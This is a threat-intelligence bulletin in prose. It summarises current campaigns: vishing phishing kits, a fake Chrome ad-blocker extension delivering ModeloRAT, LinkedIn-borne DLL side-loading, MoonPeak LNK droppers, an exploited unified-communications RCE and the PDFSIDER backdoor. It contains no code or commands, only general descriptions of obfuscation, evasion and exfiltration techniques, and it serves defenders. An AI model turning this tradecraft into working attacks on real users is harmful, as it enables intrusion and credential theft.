Threat Alerts

Custom phishing kits engineered specifically for voice-based social engineering are increasingly being sold on an as-a-service basis, enabling attackers to remotely control what victims see in their web browsers during live phone calls and dynamically manipulate authentication flows. These kits primarily target users of major platforms such as Google, Microsoft, and Okta, as well as cryptocurrency services, allowing attackers to synchronize phishing pages with verbal instructions in real time to defeat any MFA method that is not phishing-resistant. Captured credentials are forwarded via Telegram, enabling threat actors to immediately test them against legitimate login portals, identify which MFA challenge is triggered, and update the phishing page mid-call to prompt victims for OTPs or MFA push approvals. The commercialization of both these toolkits and vishing expertise itself highlights a broader shift toward highly interactive, human-led intrusion techniques that exploit trust built through direct verbal communication rather than relying solely on automated phishing at scale.

Cybersecurity researchers have identified an ongoing campaign called KongTuke that uses a malicious Chrome extension to deliberately crash browsers and trick victims into executing commands that deliver ModeloRAT malware.

The attack begins when victims search for ad blockers and encounter malicious advertisements redirecting them to a fake extension called “NexShield – Advanced Web Guardian” on the Chrome Web Store. This extension, downloaded over 5,000 times, clones the legitimate uBlock Origin Lite and waits 60 minutes before activating. It then launches a denial-of-service attack creating infinite runtime port connections that consume excessive memory, causing the browser to freeze and crash. When users restart their browser, a fake security warning appears claiming Microsoft Edge detected threats, prompting them to execute commands via Windows Run dialog.

The malicious command uses finger.exe to retrieve PowerShell scripts from attacker servers, employing multiple Base64 encoding layers and XOR operations for obfuscation. The payload scans for over 50 analysis tools and virtual machine indicators, terminating if detected. It identifies whether machines are domain-joined or standalone, sending system information including installed antivirus products to command-and-control servers. Domain-joined systems receive ModeloRAT, a Python-based remote access trojan using RC4 encryption that establishes persistence through Registry modifications and supports executing various file types. This campaign demonstrates how threat actors exploit user frustration by creating deliberate technical problems and offering fake solutions to maintain persistent access.

Threat actors are increasingly shifting phishing operations away from email and toward professional networking platforms such as LinkedIn, particularly to target executives and IT administrators. These campaigns abuse the platform’s inherent trust to establish rapport before delivering malicious WinRAR self-extracting archives that drop legitimate open-source applications alongside malicious DLLs, enabling execution via DLL side-loading. Post-compromise activity frequently relies on legitimate open-source penetration testing frameworks to maintain persistence and support data exfiltration, privilege escalation, and lateral movement. As a result, these campaigns present a heightened risk to organizations, particularly those with high-value personnel active on professional networking platforms, reflecting a broader trend toward combining social engineering, trusted software, and non-email delivery vectors to evade traditional enterprise defenses.

A new malware campaign targets Windows users through weaponized LNK shortcut files that deploy MoonPeak, a remote access trojan variant of XenoRAT linked to North Korean threat actors.

The infection begins when victims open malicious LNK files disguised as legitimate PDF documents containing Korean investment-related content. These files display a decoy PDF while executing an obfuscated PowerShell script in a hidden window. The script performs environment checks to detect security tools like IDA Pro, Wireshark, and OllyDbg, terminating if analysis environments are found. Upon passing these checks, the malware creates randomly named folders in temporary directories and establishes persistence through scheduled tasks.

The attack progresses through multiple stages, downloading GZIP-compressed payloads from GitHub repositories using Living Off Trusted Sites techniques to evade detection. The final payload deploys MoonPeak malware, obfuscated with ConfuserEx, which connects to command-and-control servers. This sophisticated infection chain demonstrates advanced evasion capabilities and persistent access mechanisms targeting financial sector users through social engineering tactics.

A critical zero-day remote code execution vulnerability, tracked as CVE-2026-20045 (CVSS Score 8.2), has been added to the Known Exploited Vulnerabilities catalog after being actively exploited in attacks. An unauthenticated, remote attacker can exploit the flaw to execute arbitrary commands on the underlying operating system of an affected device. The flaw affects Unified CM, Unified CM SME, IM & Presence, Unity Connection, and Webex Calling Dedicated Instance.

The vulnerability stems from improper validation of user-supplied input in HTTP requests, allowing an attacker to exploit it by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. There are no workarounds that address this vulnerability, and software updates have been released to address the issue.

PDFSIDER is a Windows backdoor designed for covert, long-term access and is already being leveraged by multiple ransomware operators as a payload loader. Its observed use in intrusions targeting Fortune 100 companies highlights its role in higher-end ransomware campaigns rather than opportunistic activity, reflecting a broader shift toward stealth-focused tooling within the ransomware ecosystem.

Initial access is achieved via spear-phishing emails delivering ZIP archives that contain a legitimate, digitally signed PDF creation executable alongside a malicious DLL. When launched, the application side-loads the attacker-controlled DLL, enabling execution while retaining the trust associated with signed software. Once active, PDFSIDER operates almost entirely in memory, spawning commands through anonymous pipes and CMD, assigning each compromised host a unique identifier, and collecting system reconnaissance data that is exfiltrated over DNS. Command-and-control communications are protected using AES-256-GCM encryption, while anti-analysis measures—including RAM size checks and debugger detection—allow the malware to exit early in sandboxed environments.

Operationally, PDFSIDER enables persistent, low-noise access by abusing trusted binaries, minimizing disk artifacts, and encrypting all C2 traffic, significantly complicating detection and forensic analysis. In several cases, attackers reinforced the malware deployment with social engineering, impersonating technical support personnel to persuade users to install remote access tools.